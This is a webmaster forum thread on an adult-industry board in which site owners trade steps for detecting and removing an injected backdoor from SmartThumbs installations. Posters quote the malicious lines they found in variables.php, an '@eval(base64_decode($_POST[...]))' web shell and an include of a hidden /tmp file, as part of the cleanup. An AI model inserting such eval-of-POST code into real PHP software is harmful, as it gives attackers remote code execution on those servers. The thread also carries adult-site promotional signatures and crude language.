checking and removing ST exploit
I wrote simple tutorial how to remove ST exploit and check if you're affected with it... because it looks like still many ST installs are infected and are not cleaned. I think update will not clean it... you have to do it manually...
Porn X Space 4 Webmasters Blog Archive Remove SmartThumbs exploit in 5 steps
Dude.
Thank you so much for this. I'm pretty sure mine are good but now I can be 100%
I appreciate it!
I dont give a lovely mother fuck.
yellowfiber is checking for me as i did find those lines in there, they just tried to include a different file called webcams.tmp
icq 14857306
skype dabone2
Once those are gone you will see increase in traffic for sure...
I had ases.tmp on one of my servers. Any idea just how much traffic was lost to this exploit?
Promote the #1 Filipina fetish site on the net.
Now with CCBill, Segpay, Morphed Feeds and FHG's!.
ICQ Me 88-05-05 for all info!
where exactly do you look to see if you have the exploit? I know I have tgps that need updating to latest version but evertime I do this my files get chmod to 777 when it needs to be 755 with my hosts, so have to change permissions all over again!
Basically I don't want to run something that was not needed in the first place if there is no exploit, cos knowing my luck I will mess it up! lol
I haven't found any .tmp files... but I did find that @eval code in a bunch of my sites variables.php
just open in text editor file st/admin/variables.phpOriginally Posted by smoothballs
I guess they skimmed under 10% percent of clicks...
hello, I just found this on one of my ST varaiables
is this include normal?
@include_once('/tmp/ases.tmp');
if not, how can i remove all files?
Last edited by JefersoN; May 9th, 2010 at 11:18 AM.
Looking for quality thumbs/text trades? 15k+? hit me up.. mature, MILF, shemale, BBW, interracial, big tits, bondage and general sites...
that is not normal ... remove the line and delete the file then upgrade to latest version.
i also have that line only on my variables.php
Many thanks for this info MMarko...
In my case I had quite a few infected sites as I had not updated my ST since they put in the rewrite functions in June of 2009. My newer sites were not hit.
I found updating and then saving the general settings cleaned the variables.php file. I checked a few databases after with PHPMyAdmin and the niche columns were ok, so I am thinking the upgrade clears this too. I deleted the .tmp files by hand. In my case the .tmp files had quite a few different names but were always 4 characters long.
Promote the #1 Filipina fetish site on the net.
Now with CCBill, Segpay, Morphed Feeds and FHG's!.
ICQ Me 88-05-05 for all info!
yeah thats what I started doing after reading nation x postso far so good
Cheers
Yikes, first time I have been affected too
I dont have that "sesa.temp" but I have this one:
$niche='1';@eval(base64_decode($_POST[qxp]));//';
should that one line be deleted then ?
fuck it all . im done
just this part
@eval(base64_decode($_POST[qxp]));//';
and you have to clean tables in database too! since ST is taking values for variables.php from table st_settings
shit found @include_once('/tmp/ases.tmp');
Try Shinymovies.com and Shinyangels.com from Cashlantis.com!
oy vey
look for this file as well...
/tmp/.ICE-unix/ases.tmp
Posting Permissions
Reply With Quote
